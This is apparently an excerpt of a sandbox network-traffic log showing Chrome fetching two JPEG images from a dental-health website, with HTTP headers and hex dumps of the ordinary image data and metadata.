                                                                                                                                      2024-04-24 10:13:32 UTC14994INData Raw: 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 b1 00 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 01 02 03 07 04 05 06 08 01 01 01 01 01 01 01 01 00 00
                                                                                                                                      Data Ascii: n> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:32 UTC16384INData Raw: 01 43 cd da b6 ac ed eb 3e d6 dd b7 db f8 99 17 9e 9d 91 8c 57 bd 39 be c8 c7 b5 9c 58 58 59 5b 8e 5d 9c 1c 2b 4e f6 4d f9 28 5a b7 1e 2d fe 64 bb 59 df 1d 25 d2 b8 9d 2f 83 f0 a3 4b b9 f7 d2 79 99 49 7b cf 8f c3 b7 fa 91 fa 78 84 79 3d 37 d3 b8 5d 35 b7 47 07 13 db b9 2a 4b 2b 25 aa 4a ed ce ff 00 08 af aa bb 3c cf 72 40 41 40 00 0a 40 05 00 00 00 10 00 00 50 00 00 00 02 90 01 40 00 08 e3 19 56 13 55 84 bd 99 2f 07 a3 28 03 f3 3e ed 83 2d b7 74 cd db e4 a8 f1 af dc b4 97 84 64 e9 f4 1e 19 f6 5f 33 b0 3f 07 d5 77 af c5 52 19 d6 ad e4 27 d9 cd 4f 87 3f a6 27 c6 9a 1d f3 f2 d6 e7 c4 e8 ec 0f d4 95 e8 7a ae 3f d2 7d 61 f1 1f 2a ae f3 f4 a2 87 fc 2c 9b d1 f5 f2 cb f3 9f 6e 65 40 00 40 a4 28 00 00 00 00 14 80 01 41 0a 00 00 14 00 04 00 01 40 00 00 00 02 90 04
                                                                                                                                      Data Ascii: C>W9XXY[]+NM(Z-dY%/KyI{xy=7]5G*K+%J<r@A@@P@VU/(>-td_3?wR'O?'z?}a*,ne@@(A@
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 03 cc 10 0c dc bd 66 cd cb 76 6f 5d 85 bb b7 5f 2d ab 73 9c 63 39 be e8 c6 4d 36 75 ef cc 6d e3 a9 76 8c ac 78 60 e5 cb 1b 6c cb b6 f9 25 65 28 dc f8 90 d2 e4 27 72 9c dd aa 4b 5e 0c eb 19 df bf 72 f7 e2 67 76 72 c8 4d 49 5e 94 9c a7 cc 9d 54 b9 9b a9 70 3f 4a 15 3a 34 e9 5a 6b 47 c0 f4 fd 33 bd c7 a8 36 5c 6d ca ab e3 c9 7c 2c b8 af ab 7e 1a 4f f8 b4 92 f3 3d b9 07 44 f5 be d5 91 b5 75 0e 4d 8b f7 2e 5f b7 77 ef f1 2f 5d 93 9c 9d 9b 8e a9 56 55 d6 2e b1 7e 47 ce c6 52 84 a3 38 49 c6 71 6a 51 92 d1 a6 b5 4d 1d d3 f3 1b 63 fe ab b1 3c eb 31 e6 cb da eb 7a 34 e3 2b 12 fe 74 3f 77 49 af 49 d2 cc a3 f4 27 4c ef 70 ea 0d 93 17 73 aa f8 d2 5f 0f 2e 2b ea df b7 a4 ff 00 8b 49 2f 33 c3 eb 6d 8b fa f6 c1 7e d5 98 f3 66 62 57 2b 12 9c 5c a0 be f2 df ef c3 e9 48 f8
                                                                                                                                      Data Ascii: fvo]_-sc9M6umvx`l%e('rK^rgvrMI^Tp?J:4ZkG36\m|,~O=DuM._w/]VU.~GR8IqjQMc<1z4+t?wII'Lps_.+I/3m~fbW+\H
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 46 15 6f 5b 98 ef 4b 73 f3 87 b8 fd 02 8f b5 00 10 00 00 50 42 80 00 00 00 01 40 00 00 00 00 01 14 00 14 00 04 00 01 40 00 40 00 14 00 a1 02 14 80 50 42 80 00 00 00 00 00 00 00 00 00 01 40 00 40 00 00 00 50 a4 28 40 00 00 00 00 00 00 02 00 00 00 00 00 00 80 00 00 08 50 04 00 00 21 48 00 00 00 02 05 00 00 08 52 00 00 80 02 ed 01 76 81 f9 b2 7e fc bc d9 13 d4 b3 f7 e5 e6 c8 07 3d b9 1e 42 75 47 85 07 43 c9 84 82 57 21 19 43 22 32 01 00 00 00 10 a4 00 42 90 08 00 65 10 85 20 00 00 11 68 72 c5 9c 4c b1 65 58 e6 04 4c d0 50 56 86 5c d2 38 67 78 0f 22 59 3c 8b 89 e1 df cd 9b d1 33 86 e5 ea 9c 0d d4 98 09 4e 53 75 6c c8 05 00 00 00 54 8d 28 b6 06 52 39 23 06 ce 48 db 39 63 6c 99 1c 71 b6 73 46 14 36 a2 6d 22 2b 2a 26 b9 4d 28 9b 51 03 c3 bd 6c f0 e4 a8 e8 7b 6b
                                                                                                                                      Data Ascii: Fo[KsPB@@@PB@@P(@P!HRv~=BuGCW!C"2Be hrLeXLPV\8gx"Y<3NSulT(R9#H9clqsF6m"+*&M(Ql{k
                                                                                                                                      2024-04-24 10:13:33 UTC9544INData Raw: de 8b b8 e7 a2 ae a6 25 ab ab e1 d8 51 c0 d7 76 a7 1b 8d 4e 66 bd 1f 49 89 2a f0 03 89 a3 0d 78 9c 8d 53 89 86 97 70 1c 6e bc 16 a4 6b b3 8f 79 b7 55 d9 a1 9a 77 af 10 30 e3 4a 6b 43 2d 2d 2b c4 e4 a2 6a 94 31 4d 74 03 0e 89 d2 9e 80 f4 ec f2 34 eb df ea 33 47 c6 4e 80 47 45 ef 31 55 5e 3f 41 1f 81 6b 4e 20 2a df e7 25 5d 47 05 57 2f 42 0a 54 f4 f6 01 6a a9 af d0 28 96 b5 d4 57 d2 1a 6f 50 2a ef 7e b3 4b 5d 7f 29 98 d1 2d 57 a5 97 82 ad 75 20 aa 8d f7 78 b2 f3 3f ab a9 95 af 1a bf 12 aa f6 70 ef 60 5a fa cd 68 d1 8d 3b 68 6b 8b ad 68 05 0a 8f 8a f5 84 e9 fa 59 5f 7f 2d 58 05 4f 04 38 6a 9d 6b d8 4a ba 52 9a bf 59 2a f8 2d 1b 02 eb e4 4a 3e 29 8f 0a d5 f6 b0 96 9d c0 4a ea 25 57 c3 d4 54 bb bb 4b c3 cf b8 09 14 fb b5 65 d6 9f 98 8b 9b bb 57 d8 4d 78 be 00
                                                                                                                                      Data Ascii: %QvNfI*xSpnkyUw0JkC--+j1Mt43GNGE1U^?AkN *%]GW/BTj(WoP*~K])-Wu x?p`Zh;hkhY_-XO8jkJRY*-J>)J%WTKeWMx


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      71192.168.2.164979791.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:32 UTC393OUTGET /wp-content/uploads/2017/03/home-treatment-1.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:32 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:32 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:24 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 124843
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:32 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:32 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:33 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 af 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 02 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 94 ad f0 6c e7 ad ed 5a fc 8f 1c d6 cd a7 7e 1b 32 66 32 56 a3 b9 9c a9 af 52 ba ba 3a d8 5e 18 d6 a9 c9 1a 27 27 a3 e8 6b cd 57 6a 55 55 77 7f 03 6f 23 54 7d 6b dc d6 6f 15 94 1f ba 55 74 6f b7 a9 9a d4 6a e5 85 27 55 24 a5 de 4a a9 9a 5f db 94 a8 e3 09 24 ea a5 6d 4d ae 7d 71 c1 b8 aa 4b 57 17 6e 9f ca cf 25 93 c8 ff 00 8f 9a 69 4a 3f 52 4e ae 13 6b 1c af de b6 64 ce 2b 58 cc cb d0 f2 39 10 c7 07 14 e9 de 87 99 f2 be 4a 38 eb 18 ba 27 7b 68 fe 66 9f 37 cd c5 62 59 5c 9d d7 b9 4b 54 cf 2b c8 e6 73 7c ae 47 8f 89 17 47 5f 73 d1 53 b5 4d 4d 6e dc de 0f 74 d2 63 ad f4 5b e5 3e e0 8f 1d ec 8c b7 cf a2 5e bd cf 3f 93 9d c9 e6 c9 b7 56 eb a3 bd 8e 97 17 c1 bc 9b a5 cb b4 e3 46 db ff 00 9b 4a d4 e9 61 f0 58 71 cd ca 35 6e 89 2e 87 69 74 d7 a7 37 d5 cb 69 e4 f2
                                                                                                                                      Data Ascii: lZ~2f2VR:^''kWjUUwo#T}koUtoj'U$J_$mM}qKWn%iJ?RNkd+X9J8'{hf7bY\KT+s|GG_sSMMntc[>^?VFJaXq5n.it7i
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: d1 76 38 dc 85 ba 4a 96 47 76 70 dd 0e 96 ab a3 f8 1c 4e 65 63 2a bd 2b 54 90 b0 88 e3 35 0c 89 36 e8 f5 a7 e4 7a ff 00 19 2f 6d 1c 95 ee d9 e3 b0 ca 31 95 5a 7a ab f7 3d 57 8d 93 71 49 24 da 5a fa 13 53 67 6b 93 85 72 f8 99 38 ef ff 00 99 1a 2f 46 7c 9f cb f0 a5 83 3e 4c 53 54 69 b4 7d 67 1b 8a d3 aa af c0 f2 5f 78 78 d5 ed e4 e1 55 ad e7 4e e6 b6 99 8c ce 2b c2 70 79 73 e2 e7 57 a5 19 f5 3f b6 fc ca e4 e3 8e 29 be 9f 99 f2 5e 4c 36 cb 72 b1 da f0 1e 4e 58 32 c5 27 4d af b9 89 71 c5 6a c7 d6 b9 9c 2c 79 62 f2 62 55 6e e7 1b e9 b8 4d a6 9a 4b 5e c7 53 c5 f9 08 f2 70 c1 3d 68 63 cb c2 a3 27 25 ee 4f a1 b6 5a 6a 2e 51 b2 b3 ef a9 9e 17 1c 73 4a 4a 97 ad 0c e3 0a 24 fb 14 cd 52 71 5f 8b 28 e2 7d c1 5c 59 e7 6b 64 f7 25 f1 d4 f1 7c 79 b5 e4 95 35 dc 7b bf b9
                                                                                                                                      Data Ascii: v8JGvpNec*+T56z/m1Zz=WqI$ZSgkr8/F|>LSTi}g_xxUN+pysW?)^L6rNX2'Mqj,ybbUnMK^Sp=hc'%OZj.QsJJ$Rq_(}\Ykd%|y5{
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: d0 99 30 da c3 cc c7 34 9e 9e 87 57 c7 a5 9f 3c 52 ba a9 e7 21 c7 94 1d 74 ea 7a 9f b6 b8 d3 5b b3 4e eb f9 6a 73 f2 ed ed d2 d7 4f 1e be ed e4 8f 4f 8d 24 92 45 b1 9b 4e c5 51 a1 2d dc f9 59 b9 cb e9 fb 66 1b 78 f9 0f 49 9b 0a 4a 57 4c e6 ee 26 19 5c 74 3b e9 e6 b3 8b cb cf e4 fc 79 79 d7 8a df 93 29 9b 22 39 d4 ac ec c8 9b 3d 12 cb cc 79 76 d6 eb 71 66 1a d9 65 44 ce 67 21 d4 e8 66 d0 e7 e6 d2 a6 91 cf e4 35 18 ba 9e 0f cf e4 dd 91 ae ac f6 7c fc bb 62 d9 e1 3c c4 f7 4a 52 ee c0 e3 b9 ef 83 ec ba 1a 9c 68 ee e6 25 af ba 95 37 71 e3 94 a1 2e dd 07 0b 06 ce 54 24 fb f5 27 a8 f7 9e 1b 8f b7 1c 2c 7a be 36 34 a2 8e 07 87 a3 c4 91 e9 38 f6 8a 20 d8 d8 b6 94 4e 37 36 d6 85 19 15 2e 58 2a d0 c7 ea 50 49 f5 35 e7 3a 01 6e 5c 9e d6 71 b9 99 d4 14 ae 6d e6 cf 45
                                                                                                                                      Data Ascii: 04W<R!tz[NjsOO$ENQ-YfxIJWL&\t;yy)"9=yvqfeDg!f5|b<JRh%7q.T$',z648 N76.X*PI5:n\qmE
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: fb 6a bf dc 4a 6d a7 47 5a 6a 8a 9a 71 9d 2b 46 ee 65 1b 64 55 a2 92 57 f5 44 19 51 6e ec f5 45 52 6e 32 a4 97 b2 5f b4 d8 95 e3 da 5d 3e 25 53 4b 24 2b 4b da bd d3 45 c1 2a d7 0d d1 57 ab 5d 5f 54 6b 4b da b6 d2 97 d0 bf 1b 71 92 af e1 dc c3 3c 77 55 e8 f5 8b 18 32 aa 53 69 51 bd 3a 9c de 52 6a 32 6b 4e da a2 ec f9 25 0a 4a ba ba 33 5f 2e 47 4a eb 17 60 38 7c b8 37 07 2b b6 bb 74 38 93 e1 7d 49 ef 5a bb 9e 97 3c 13 d2 cf 43 45 f1 e5 8a 73 5d 35 a3 fd a1 a7 0f 26 1a c5 c6 4a b2 fe 6f e2 72 39 58 da d7 5e eb 4a 1e af 3e 3a 35 96 2b 74 7f 99 7a 33 99 ce e0 47 dd 2c 6d 3e b4 7a 32 eb 79 4d a6 63 cf 2c fb 65 b6 4e dd bf 79 eb 7e df e6 55 47 05 6f fc af d0 f1 9c 88 38 e5 da e3 4b ff 00 b5 0e b7 8e cb 2c 52 8b 8d 63 25 74 75 97 db 8a f3 6d 3d d9 9e 8f a0 cb dd
                                                                                                                                      Data Ascii: jJmGZjq+FedUWDQnERn2_]>%SK$+KE*W]_TkKq<wU2SiQ:Rj2kN%J3_.GJ`8|7+t8}IZ<CEs]5&Jor9X^J>:5+tz3G,m>z2yMc,eNy~UGo8K,Rc%tum=
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: da ba 54 de 89 5d 8f 27 15 39 f1 f3 bb 29 e3 49 ae 9b 95 9b 39 f9 1a 51 95 1d 61 5a 45 bd 2a 75 39 49 65 e0 63 95 5b 51 94 92 95 2c ab 46 bb 1c 4e 4c dc 53 54 5e db 6d 5d 5f 73 a5 61 8f 19 4d 49 dd 35 2d 3a dd 77 36 21 cc cf e1 f9 f8 bc cf 8d ac 73 e1 5b 79 38 63 a6 4c 7a ca 9e a8 a7 8d 09 63 87 d4 dc 94 5b 96 d7 ae 86 c4 78 8b 93 0d f0 95 25 56 9d 1d 3f 12 59 2c c3 5d df 48 e7 71 fc 67 fa 97 f6 bc 27 c1 9c 57 3f 02 fa 9c 2c 92 b3 86 54 bd d8 a7 e9 2d 1f e2 7c 95 55 39 f1 79 69 e2 e4 e0 72 c5 97 14 af 28 ca 2e 8e 2c ed fd a9 ce f3 1e 07 ce cf 07 88 c1 fe 6a e6 2a cb 87 b9 63 6e 51 5b 9c a0 dd 55 68 99 d4 f3 18 7c 67 dd 12 c5 f7 7e 1c 13 c0 f1 67 c5 c7 f3 7c 55 44 e9 2b 47 3d 57 fe 96 73 99 9c 55 78 ec 7c 7e 46 6c d0 c1 c6 52 c9 39 c9 47 14 16 ae 4f 44 91
                                                                                                                                      Data Ascii: T]'9)I9QaZE*u9Iec[Q,FNLST^m]_saMI5-:w6!s[y8cLzc[x%V?Y,]Hqg'W?,T-|U9yir(.,j*cnQ[Uh|g~g|UD+G=WsUx|~FlR9GOD
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 84 f7 c2 6e 0d 68 d3 a1 bd c3 fb 9f 9d c7 6a 33 f7 c5 7c 99 c6 9c 9d 6c e8 ff 00 33 0a 57 5f c4 e3 e4 d3 5d ff 00 74 95 d3 5d ae bd 2e 1e e7 8d f7 17 03 97 45 97 fb 72 76 75 b1 d2 84 b0 67 be 1c b1 7f ed a1 f3 54 ef 6e bf 8d 8d de 1e 7e 4c 27 fd a9 ca 34 75 ef f9 1e 5d ff 00 0e 5e 74 b8 f8 5e 8e d3 cf 67 ee 99 7b d9 63 94 69 5b 98 7d 15 2e ba 9c ae 3f 91 e4 a8 a5 27 bb fa 9b b7 e4 6c bf 27 8e 36 ca b6 bf 43 95 fc 7f 2e bf ed cf c9 ab e5 d6 f4 b8 6f ae 02 9f f3 50 c5 f8 a7 27 69 1a 5f f9 ae 32 b6 e6 a9 dd 96 c7 cc e1 77 8e 55 f0 1e dc 7e ed 2a 5b 7b 6d 2a f7 e1 24 ff 00 9a bd 8d bc 78 39 38 b0 c3 14 26 e2 a2 f7 36 9d 2b 4e 86 83 f2 f1 b7 bd 57 b1 8c fc c4 12 75 ca 8b 36 9a f3 25 66 fb af 5a ea e4 fa f9 5f f7 25 17 24 db 8b ed f2 30 50 cd 44 a7 9a f7 f7 f5
                                                                                                                                      Data Ascii: nhj3|l3W_]t].ErvugTn~L'4u]^t^g{ci[}.?'l'6C.oP'i_2wU~*[{m*$x98&6+NWu6%fZ_%$0PD
                                                                                                                                      2024-04-24 10:13:33 UTC10646INData Raw: f7 57 1e 78 d3 9c a3 57 fa a8 eb ad 8b b3 71 bc 3f 94 52 73 84 63 2c bf cd 8d d2 fd e8 ec cf 98 c2 5b 5b 71 95 1f e4 6e e0 f2 19 b1 c2 9b 9b 6a c9 7a 33 5e e4 c3 d2 f3 7e c5 e3 e7 6e 7c 3e 4c 60 fa 46 7e da b3 8f 97 ec 1f 31 09 49 63 50 c8 95 1a 6a 6a e9 9b 18 3c df 2f 0e cc 9b b7 41 ea 9f a3 49 9b 0f ee 6e 5a 94 a3 09 b8 a8 fe a4 ff 00 65 fb 36 31 0e 79 cb 89 93 ec df 3f 8a 5b 5f 0a 52 ff 00 9a 0d 35 fb 4a bf fb 53 cf aa b5 c0 ca 97 aa ed f3 3d 12 fb ab 95 19 a6 f4 4b 45 66 db f8 98 3f bb 39 c9 d1 cb 4b b4 ee a8 31 0c b8 71 fb 47 cf e4 a6 de 14 95 55 69 27 14 fe 3a 96 63 fb 37 cf a6 f7 42 38 d4 5d 2f 38 9b b2 fb 9b 9a a5 79 ba 3b 26 fa 1a f9 be e0 e6 64 f7 4f 24 a8 dd d5 69 51 89 ea 66 fa 36 21 f6 6f 36 11 73 e5 73 70 63 8a ba da dc 9d 7f 22 65 e0 7c 6f
                                                                                                                                      Data Ascii: WxWq?Rsc,[[qnjz3^~n|>L`F~1IcPjj</AInZe61y?[_R5JS=KEf?9K1qGUi':c7B8]/8y;&dO$iQf6!o6sspc"e|o


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      72192.168.2.164980091.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:32 UTC387OUTGET /wp-content/uploads/2017/03/home-intro.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:32 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:32 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:22 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 119599
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:32 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:32 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:33 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 bd 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: bd 8f 85 6e 91 85 c8 49 a5 bc 96 bf 13 7a d9 d9 8b 2b 24 6e e3 d9 f3 c5 2e 6e 0e 4b 9d bf 98 4f 31 cd a7 39 4a 8b 65 2f d4 a8 4d c2 c2 fa e2 d2 ed 83 6d 16 c7 03 06 16 e3 73 22 3c bc ca b0 52 93 52 6b f6 94 55 74 37 c7 c6 b1 cf 68 a1 65 ed 25 6d ba 2a c5 ca 89 57 c0 a9 4e f6 4c d4 1c 65 73 b2 dc 7f 52 3a 1e 8e 1d ab 49 c5 43 ce f5 6d 4a 52 4a 95 8e 9e 5d c9 4e 51 56 94 54 a7 6e de ca 09 ab 7a 76 d2 34 75 26 67 a1 8b de a9 ff 00 2f 92 e5 77 9d ab 0a 5f 81 ca b2 f9 3a 23 4c 30 f1 ae 5a 56 e4 e8 a3 2e 6b b2 af 2a d3 44 aa d2 5a 77 12 b1 f9 6b 36 eb 6e ad f1 71 54 7b 71 93 f3 0b f3 8a aa 36 f1 a0 df 16 fc cf bb 89 33 b5 ce 16 49 dc 47 1b a7 c2 9c aa 73 69 e9 08 3a a6 bf 79 c4 d5 cb 89 58 bb 96 ae 5b 5c 23 29 47 95 2e ea 38 9c eb 99 17 62 d2 ba f6 da 3a ad 3c
                                                                                                                                      Data Ascii: nIz+$n.nKO19Je/Mms"<RRkUt7he%m*WNLesR:ICmJRJ]NQVTnzv4u&g/w_:#L0ZV.k*DZwk6nqT{q63IGsi:yX[\#)G.8b:<
